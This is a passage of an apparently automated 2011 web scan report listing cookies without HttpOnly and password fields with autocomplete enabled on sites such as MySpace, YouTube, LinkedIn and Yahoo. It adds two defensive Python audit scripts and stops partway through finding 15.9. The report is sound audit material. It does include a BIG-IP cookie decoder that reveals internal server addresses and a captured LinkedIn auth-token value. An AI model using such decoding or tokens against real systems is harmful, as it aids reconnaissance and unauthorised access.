The following cookie was issued by the application and does not have the HttpOnly flag set: MSCulture. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Its value embeds the requesting IP address (IP=50.23.123.106), locale preferences and a base64-encoded geolocation record (USRLOC) rather than a session identifier.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: 9fd3a6d53bb05cb31e6d757d4c5a9f0864a042db68c9cdb0
Set-Cookie: MSCulture=IP=50.23.123.106&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sun, 11-Sep-2011 01:26:20 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Pimple Faced Geeks
Date: Sun, 04 Sep 2011 01:26:20 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

14.155. http://www.nbcudigitaladops.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: pers_cookie_insert_nbc_blogs_80. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The name and the N.N.0000 value identify it as an F5 BIG-IP cookie-insert persistence cookie, which encodes the backend pool member's address and port.

Request

GET /favicon.ico HTTP/1.1
Host: www.nbcudigitaladops.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:28:39 GMT
Connection: close
Set-Cookie: pers_cookie_insert_nbc_blogs_80=3334722112.20480.0000; expires=Sun, 04-Sep-2011 05:28:39 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

14.156. http://www.newslibrary.com/nlsearch.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newslibrary.com
Path:   /nlsearch.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARCH_HOST. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that its Domain attribute (.newsbank.com) does not cover the issuing host www.newslibrary.com, so a compliant browser rejects this Set-Cookie header outright and the cookie is never stored.

Request

GET /nlsearch.asp HTTP/1.1
Host: www.newslibrary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:21 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="NewsLibrary"
Set-Cookie: ARCH_HOST=nl.newsbank.com; path=/; domain=.newsbank.com;
Connection: close
Content-Type: text/html
Content-Length: 1910


<html><head>
<title>NewsLibrary Error</title>
</head>
<body>
<map name="FPMap0">
<area href="/nlsite/faq.htm" shape="rect" coords="386, 20, 429, 37">
<area href="/nlsite/about.htm" shape="rect" coor
...[SNIP]...

14.157. http://www.sacbee.com/reg_js/access_check.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg_js/access_check.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: vmix_core_user_info. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Here the value is .null and the expiry date (09-Sep-2010) lies in the past, so this header deletes the cookie rather than setting one, and the missing flag has no practical effect.

Request

GET /reg_js/access_check.js HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Wed, 21 Sep 2005 15:09:45 GMT
ETag: "108293-4b-433177b9"
Accept-Ranges: bytes
Content-Length: 75
Content-Type: application/x-javascript
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:14 GMT
Connection: close
Set-Cookie: vmix_core_user_info=.null; domain=.sacbee.com; path=/vmix_hosted_apps; expires=Thu, 09-Sep-2010 01:27:14 GMT

// $Id: access_denied.js 302 2005-09-21 15:09:45Z shilton $
verified=true;

14.158. http://www.wtp101.com/pull_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: tuuid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The same UUID is passed to sync.adap.tv in the Location header of the 302, so this is a cross-site user-sync (tracking) identifier with a two-year lifetime rather than a session token.

Request

GET /pull_sync?pid=adaptv HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:15:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://sync.adap.tv/sync?type=gif&key=adnetik&uid=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 03 Sep 2013 01:15:38 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


14.159. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: GEO. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=9fbf89003429ef13c94fa32a778173c7cwsAAAAzVVMyF3tqTmLURA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pVGtMNkNySllZZy1xcllLQ0JZZ1g0UGpZSkVpdS1YZ29NZ1pFdVRSWG1CdHU5QndvLVZkUjRB -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

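Reviewing what a flagged cookie actually holds is the step the scanner leaves to the reader. The Python script below is an added example, not part of the XSS.CX/Burp report or any vendor's tooling. It parses the Set-Cookie values quoted in the findings above (copied into the script as constructed sample input, paired with the host that sent them), reports missing HttpOnly and Secure flags, applies the RFC 6265 domain-match rule under which a browser discards the ARCH_HOST cookie in 14.156, flags random-looking values such as the tuuid sync identifier in 14.158, and decodes values of the form N.N.0000 (cars_persist in 14.144-14.153, pers_cookie_insert_nbc_blogs_80 in 14.155), which is the F5 BIG-IP cookie-insert persistence format encoding the pool member's IPv4 address and port. The Secure check and the BIG-IP decoder go beyond what the scanner reports; the session-token heuristic (SESSION_NAME_HINTS and OPAQUE_VALUE_RE) is this example's own assumption, not the scanner's logic.

```python
"""Added example (not from the scan report): audit Set-Cookie headers the way a
reviewer would when the scanner says "review the contents of the cookie"."""
import re
import socket
import struct
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: Set-Cookie values copied from responses in this report,
# paired with the host that issued them.
SAMPLE_SET_COOKIES = [
    ("www.careerbuilder.com", "jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/"),
    ("www.cars.com", "cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/"),
    ("www.newslibrary.com", "ARCH_HOST=nl.newsbank.com; path=/; domain=.newsbank.com;"),
    ("www.wtp101.com", "tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; "
                       "expires=Tue, 03 Sep 2013 01:15:38 GMT; domain=.wtp101.com"),
    ("www.linkedin.com", "NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;"
                         "expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly"),
]

# Heuristic (this example's assumption): names or values that suggest a session/tracking token.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")
OPAQUE_VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]{20,}$")    # hex / base64 / UUID-like blobs
BIGIP_RE = re.compile(r"^(\d{1,10})\.(\d{1,5})\.0000$")    # F5 cookie-insert persistence (IPv4)


@dataclass
class CookieReport:
    host: str
    name: str
    value: str
    httponly: bool
    secure: bool
    domain: Optional[str]
    opaque_token: bool        # value or name looks like a session/tracking identifier
    backend: Optional[str]    # decoded BIG-IP target "ip:port" when the value is one


def decode_bigip(value: str) -> Optional[str]:
    """Decode an F5 BIG-IP persistence value to 'ip:port'. Field 1 is the pool member's
    IPv4 address as a little-endian 32-bit integer, field 2 the port with its two bytes
    swapped, field 3 is always 0000. Returns None for anything else."""
    m = BIGIP_RE.match(value)
    if not m:
        return None
    ip_int, port_swapped = int(m.group(1)), int(m.group(2))
    if ip_int > 0xFFFFFFFF or port_swapped > 0xFFFF:
        return None
    ip = socket.inet_ntoa(struct.pack("<I", ip_int))
    port = ((port_swapped & 0xFF) << 8) | (port_swapped >> 8)
    return f"{ip}:{port}"


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 domain-match: a browser discards a cookie whose Domain attribute
    does not cover the host that set it."""
    d = domain.lstrip(".").lower()
    h = host.lower()
    return h == d or h.endswith("." + d)


def parse_set_cookie(host: str, header: str) -> CookieReport:
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")      # split on the first '=' only; values may contain '='
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()      # flag attributes (httponly, secure) map to ""
    lname = name.lower()
    return CookieReport(
        host=host, name=name, value=value,
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        domain=attrs.get("domain"),
        opaque_token=any(h in lname for h in SESSION_NAME_HINTS) or bool(OPAQUE_VALUE_RE.match(value)),
        backend=decode_bigip(value),
    )


def findings(report: CookieReport) -> list:
    """Plain-English observations for one cookie; an empty list means nothing to report."""
    out = []
    if report.domain and not domain_matches(report.host, report.domain):
        out.append(f"Domain={report.domain} does not cover {report.host}: browsers will reject this cookie")
        return out    # the remaining checks are moot for a cookie that is never stored
    if not report.httponly:
        out.append("missing HttpOnly" + (" (opaque token: treat as session-grade)"
                                         if report.opaque_token else " (no token-like value)"))
    if not report.secure:
        out.append("missing Secure")
    if report.backend:
        out.append(f"BIG-IP persistence cookie discloses pool member {report.backend}")
    return out


def audit(samples=SAMPLE_SET_COOKIES) -> dict:
    """Map cookie name -> list of findings for every (host, Set-Cookie) sample."""
    result = {}
    for host, header in samples:
        rep = parse_set_cookie(host, header)
        result[rep.name] = findings(rep)
    return result


if __name__ == "__main__":
    for name, notes in audit().items():
        print(f"{name}: {'; '.join(notes) or 'ok'}")
```

Running it decodes cars_persist to 172.20.65.236:80, an RFC 1918 address, which is why a cookie that carries no session token can still merit a finding of its own (internal addressing disclosure), and it reports only the missing Secure flag for the LinkedIn NSC_MC_QH_MFP cookie, the one sample that does carry httponly.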
15. Password field with autocomplete enabled
There are 17 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" on the FORM tag (to cover every field in the form) or on the individual INPUT tags (to cover specific fields). Only the literal value off disables the feature: an empty value such as autocomplete="" (as in finding 15.2 below) leaves the browser default in place. Current versions of the major browsers deliberately ignore autocomplete="off" on login password fields so that their password managers keep working, so treat this control as defence in depth for older clients rather than as a guarantee.

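The check behind this finding is simple to reproduce. The Python script below is an added example, not part of the XSS.CX/Burp report: it walks HTML with the standard-library parser, tracks the enclosing form of every password input, and reports the field unless either the form or the input carries the literal token autocomplete="off". The sample input is constructed from the form fragments quoted in 15.1 to 15.3 (trimmed to the tags that matter) plus two hardened variants, labelled "constructed", that show the check passing.

```python
"""Added example (not from the scan report): find password fields that neither they
nor their enclosing form protect with autocomplete="off"."""
from html.parser import HTMLParser

# Constructed sample input: fragments quoted in findings 15.1-15.3, plus two hardened
# variants written for this example.
SAMPLE_PAGES = {
    "digg.com/submit":
        '<form class="hidden"><input type="text" name="ident">'
        '<input type="password" name="password" id="password-saved"></form>',
    "login.yahoo.com/config/login":
        '<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form">'
        "<input name='passwd' id='passwd' type='password' maxlength='64'></form>",
    "slashdot.org/bookmark.pl":
        '<form action="https://slashdot.org/my/login" method="post"><fieldset>'
        '<input type="password" name="upasswd" placeholder="6-20 characters long"></fieldset></form>',
    "form-level off (constructed)":
        '<form action="affiliate-employee-login.cfm" method="post" autocomplete="off">'
        '<input id="password_field" type="password" name="password"></form>',
    "field-level off (constructed)":
        '<form action="/secure/login" method="POST">'
        '<input type="password" name="session_password" autocomplete="off"></form>',
}


def _is_off(value):
    """Autocompletion is disabled only by the literal token 'off' (case-insensitive);
    a missing attribute or an empty string leaves the browser default (on)."""
    return value is not None and value.strip().lower() == "off"


class PasswordFieldAuditor(HTMLParser):
    """Records every password input that is not covered by autocomplete="off"
    on itself or on its enclosing form."""

    def __init__(self):
        super().__init__()
        self._forms = []        # stack of (action, autocomplete attribute) for open <form> tags
        self.findings = []      # dicts with keys: action, field, reason

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)         # html.parser lowercases names; value is None for bare attributes
        if tag == "form":
            self._forms.append((a.get("action") or "", a.get("autocomplete")))
        elif tag == "input" and (a.get("type") or "text").lower() == "password":
            action, form_ac = self._forms[-1] if self._forms else ("", None)
            field_ac = a.get("autocomplete")
            if _is_off(form_ac) or _is_off(field_ac):
                return
            if form_ac is not None:
                reason = f'form autocomplete="{form_ac}" is not "off"'
            elif field_ac is not None:
                reason = f'input autocomplete="{field_ac}" is not "off"'
            else:
                reason = "neither form nor input sets autocomplete"
            self.findings.append({"action": action, "field": a.get("name") or "", "reason": reason})

    def handle_endtag(self, tag):
        if tag == "form" and self._forms:
            self._forms.pop()


def audit_password_fields(html):
    """Return the unprotected password fields found in one HTML document."""
    p = PasswordFieldAuditor()
    p.feed(html)
    p.close()
    return p.findings


def audit_all(pages=SAMPLE_PAGES):
    """Map sample label -> findings for that page."""
    return {label: audit_password_fields(markup) for label, markup in pages.items()}


if __name__ == "__main__":
    for label, hits in audit_all().items():
        print(label, "->", hits or "no unprotected password fields")
```

The Yahoo sample is the instructive one: the form does set an autocomplete attribute, but its value is the empty string, which the check correctly refuses to treat as off. The digg form has no action attribute at all, so the reported action is empty and the form submits to the page's own URL.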

15.1. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL: none (the <form class="hidden"> element has no action attribute, so it submits to the page's own URL). The form contains the following password field with autocomplete enabled: password (id="password-saved").

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

15.2. https://login.yahoo.com/config/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page contains a form with the following action URL: https://login.yahoo.com/config/login?. The form contains the following password field with autocomplete enabled: passwd. Note that the form carries autocomplete="" rather than autocomplete="off"; an empty value does not disable the feature.

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" id="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>


</div>
...[SNIP]...

15.3. http://slashdot.org/bookmark.pl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The page contains a form with the following action URL: https://slashdot.org/my/login. The form contains the following password field with autocomplete enabled: upasswd.

Request

GET /bookmark.pl HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Bender: You can trust anything!
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 15218
Date: Sun, 04 Sep 2011 01:24:04 GMT
X-Varnish: 19386691
Age: 0
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>

<meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0, maximum-scale=10.0" />
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<div id='embbeded_login_modal' class="hide">
<form action="https://slashdot.org/my/login" method="post" onsubmit="if (global_returnto) { this.returnto.value = global_returnto }" class="embedded"><fieldset>
...[SNIP]...
</label>
<input type="password" name="upasswd" placeholder="6-20 characters long">
</p>
...[SNIP]...

15.4. http://slashdot.org/bookmark.pl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The page contains a form with the following action URL: https://slashdot.org/my/login. The form contains the following password field with autocomplete enabled: upasswd.

Request

GET /bookmark.pl HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Bender: You can trust anything!
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 15218
Date: Sun, 04 Sep 2011 01:24:04 GMT
X-Varnish: 19386691
Age: 0
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>

<meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0, maximum-scale=10.0" />
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<div id='embbeded_login_modal' class="hide">
<form action="https://slashdot.org/my/login" method="post" onsubmit="if (global_returnto) { this.returnto.value = global_returnto }" class="embedded"><fieldset>
...[SNIP]...
</label>
<input type="password" name="upasswd" placeholder="6-20 characters long">
</p>
...[SNIP]...

15.5. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The page contains a form with the following action URL: /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html. The form contains the following password field with autocomplete enabled: login_password.

Request

GET /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 04 Sep 2011 01:26:08 GMT
Date: Sun, 04 Sep 2011 01:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

fsn - -->
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='net_loginblock'></td>
...[SNIP]...

15.6. http://www.ispsports.com/radio-network-affiliates.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ispsports.com
Path:   /radio-network-affiliates.cfm

Issue detail

The page contains a form with the following action URL: affiliate-employee-login.cfm (relative to the page). The form contains the following password field with autocomplete enabled: password (id="password_field").

Request

GET /radio-network-affiliates.cfm HTTP/1.1
Host: www.ispsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:26:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</h5>
       
       <form id="login" action="affiliate-employee-login.cfm" method="post">
           <div id="username">
...[SNIP]...
</label>
               <input id="password_field" type="password" name="password" title="Password" value="" tabindex="2" />
           </div>
...[SNIP]...

15.7. https://www.linkedin.com/secure/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The page contains a form with the following action URL: /secure/login. The form contains the following password field with autocomplete enabled: session_password.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...
</script>


<form action="/secure/login" method="POST" accept-charset="UTF-8" name="login"> <input type="hidden" name="csrfToken" value="ajax:5566771188046466858">
...[SNIP]...
<div class="fieldgroup">

<input type="password" name="session_password" value="" id="session_password-login" tabindex="2">
<a href="http://www.linkedin.com/passwordReset?trk=signin_fpwd" class="nav-link">
...[SNIP]...

15.8. http://www.outbrain.com/privacy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outbrain.com
Path:   /privacy

Issue detail

The page contains a form with the following action URL:

https://www.outbrain.com/login

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /privacy HTTP/1.1
Host: www.outbrain.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:24 GMT
Server: Apache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 15463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lan
...[SNIP]...
</p>
<form id="dash-signin" action="https://www.outbrain.com/login" method="post">

<input type="hidden" name="submitted" value="true"/>
...[SNIP]...
</label> <input type="password" id="signin-pass" name="loginPassword" />
</div>
...[SNIP]...

15.9. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

/reg-bin/int.cgi

The form contains the following password fields with autocomplete enabled:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
